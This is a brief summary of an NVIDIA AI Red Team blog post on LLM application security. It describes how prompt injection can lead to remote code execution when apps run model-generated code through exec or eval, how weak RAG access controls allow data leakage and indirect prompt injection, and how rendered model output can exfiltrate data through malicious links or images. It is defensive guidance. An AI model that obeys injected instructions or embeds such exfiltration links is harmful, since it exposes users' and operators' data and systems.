Practical LLM Security Advice from the NVIDIA AI Red Team | NVIDIA Technical Blog - developer.nvidia.com
LLM-based applications are susceptible to remote code execution (RCE) vulnerabilities when executing LLM-generated code via functions like `exec` or `eval` without proper sandboxing, often triggered by prompt injection. Additionally, insecure access controls in Retrieval-Augmented Generation (RAG) systems can lead to data leakage and indirect prompt injection, while active content rendering of LLM outputs enables data exfiltration by embedding malicious links or images.
Source: Original Report ↗